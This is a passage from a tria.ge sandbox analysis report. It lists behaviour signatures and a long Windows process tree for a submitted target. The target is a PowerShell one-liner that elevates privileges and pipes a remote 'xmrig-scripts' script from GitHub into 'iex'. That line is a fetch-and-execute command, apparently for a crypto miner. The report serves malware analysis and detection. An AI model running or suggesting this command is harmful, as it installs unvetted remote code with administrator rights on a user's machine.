Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    600s
  • max time network
    600s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    26/06/2024, 23:33

General

  • Target

    http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex

Malware Config

Signatures

  • Downloads MZ/PE file
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 4 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 43 IoCs
  • Loads dropped DLL 64 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Checks system information in the registry 2 TTPs 18 IoCs

    System information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 18 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 8 IoCs
  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 10 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 17 IoCs
  • Modifies Internet Explorer settings 1 TTPs 14 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of UnmapMainImage 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\LaunchWinApp.exe
    "C:\Windows\system32\LaunchWinApp.exe" "http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex"
    1⤵
    • Access Token Manipulation: Create Process with Token
    PID:1640
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    1⤵
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:3472
  • C:\Windows\system32\browser_broker.exe
    C:\Windows\system32\browser_broker.exe -Embedding
    1⤵
    • Modifies Internet Explorer settings
    PID:1428
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4232
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:652
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious use of AdjustPrivilegeToken
    PID:432
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Drops file in Windows directory
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:2680
  • C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3348
    • C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe"
      2⤵
      • Checks processor information in registry
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4916
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.0.253263564\1666715509" -parentBuildID 20221007134813 -prefsHandle 1736 -prefMapHandle 1716 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0b1bc83-3f1d-4686-8068-cb4024606cd8} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 1824 20cfe9ce158 gpu
        3⤵
          PID:4812
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.1.2105767407\1393510733" -parentBuildID 20221007134813 -prefsHandle 2168 -prefMapHandle 2156 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eff2cd15-9b23-46a3-9cff-769ca4695bf4} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 2180 20cfe8fb358 socket
          3⤵
          • Checks processor information in registry
          PID:4952
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.2.1072239049\118926637" -childID 1 -isForBrowser -prefsHandle 3124 -prefMapHandle 3120 -prefsLen 20866 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d4b5d16-f731-455b-b64c-a9aeda37f31c} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 3136 20c87311558 tab
          3⤵
            PID:1484
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.3.1333361495\869113507" -childID 2 -isForBrowser -prefsHandle 3396 -prefMapHandle 3376 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {07302cb8-e27d-49af-a573-06849357c768} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 3408 20c877dab58 tab
            3⤵
              PID:2252
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.4.1818201270\1027860085" -childID 3 -isForBrowser -prefsHandle 4336 -prefMapHandle 4324 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e5539895-a374-4540-97db-07a54d9f5c89} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 3456 20c88383c58 tab
              3⤵
                PID:3452
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.5.1089039125\1913300989" -childID 4 -isForBrowser -prefsHandle 2624 -prefMapHandle 4832 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {48f6a0e0-2593-43ae-827b-b70ebd43c0eb} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 4812 20c895e6558 tab
                3⤵
                  PID:208
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.6.901914592\1157740721" -childID 5 -isForBrowser -prefsHandle 5056 -prefMapHandle 5060 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6a951b25-98a4-4879-94eb-9ff815ffedd9} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 5048 20c8a226858 tab
                  3⤵
                    PID:4944
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.7.508253332\1059688177" -childID 6 -isForBrowser -prefsHandle 5240 -prefMapHandle 5244 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e1b9deee-dadd-4bdc-9f4b-e0dee4e52a84} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 5236 20c8a225058 tab
                    3⤵
                      PID:2972
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe"
                  1⤵
                  • Enumerates system info in registry
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:1452
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffde1649758,0x7ffde1649768,0x7ffde1649778
                    2⤵
                      PID:1700
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1660 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:2
                      2⤵
                        PID:4104
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:8
                        2⤵
                          PID:1432
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2100 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:8
                          2⤵
                            PID:2404
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2972 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:1
                            2⤵
                              PID:4208
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2988 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:1
                              2⤵
                                PID:4520
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4528 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:1
                                2⤵
                                  PID:2080
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4700 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:8
                                  2⤵
                                    PID:508
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4772 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:8
                                    2⤵
                                      PID:1120
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4472 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:8
                                      2⤵
                                        PID:1200
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4472 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:8
                                        2⤵
                                          PID:3452
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4484 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:8
                                          2⤵
                                            PID:1444
                                        • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                          "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                          1⤵
                                            PID:1560
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                            1⤵
                                            • Enumerates system info in registry
                                            • Modifies data under HKEY_USERS
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4880
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffde1649758,0x7ffde1649768,0x7ffde1649778
                                              2⤵
                                                PID:4624
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1528 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:2
                                                2⤵
                                                  PID:3064
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                  2⤵
                                                    PID:3544
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2056 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                    2⤵
                                                      PID:696
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2860 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:1
                                                      2⤵
                                                        PID:3252
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2872 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:1
                                                        2⤵
                                                          PID:2356
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4488 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:1
                                                          2⤵
                                                            PID:2604
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4496 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                            2⤵
                                                              PID:3048
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4764 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                              2⤵
                                                                PID:4796
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4820 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                2⤵
                                                                  PID:3440
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4640 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                  2⤵
                                                                    PID:4568
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4712 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                    2⤵
                                                                      PID:2736
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5180 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:1
                                                                      2⤵
                                                                        PID:3776
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3452 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:1
                                                                        2⤵
                                                                          PID:4080
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                          2⤵
                                                                            PID:3224
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3160 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                            2⤵
                                                                              PID:1092
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5860 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                              2⤵
                                                                                PID:3004
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1672 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                                2⤵
                                                                                  PID:3012
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=812 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                                  2⤵
                                                                                    PID:704
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4736 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                                    2⤵
                                                                                      PID:2612
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5596 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                                      2⤵
                                                                                        PID:1748
                                                                                      • C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe
                                                                                        "C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks whether UAC is enabled
                                                                                        • Drops file in Program Files directory
                                                                                        • Enumerates system info in registry
                                                                                        • Modifies Internet Explorer settings
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:1852
                                                                                        • C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe
                                                                                          MicrosoftEdgeWebview2Setup.exe /silent /install
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1360
                                                                                          • C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"
                                                                                            4⤵
                                                                                            • Event Triggered Execution: Image File Execution Options Injection
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Checks system information in the registry
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:4872
                                                                                            • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                              "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Modifies registry class
                                                                                              PID:200
                                                                                            • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                              "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Modifies registry class
                                                                                              PID:4056
                                                                                              • C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
                                                                                                "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Modifies registry class
                                                                                                PID:3604
                                                                                              • C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
                                                                                                "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Modifies registry class
                                                                                                PID:1168
                                                                                              • C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
                                                                                                "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Modifies registry class
                                                                                                PID:4332
                                                                                            • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
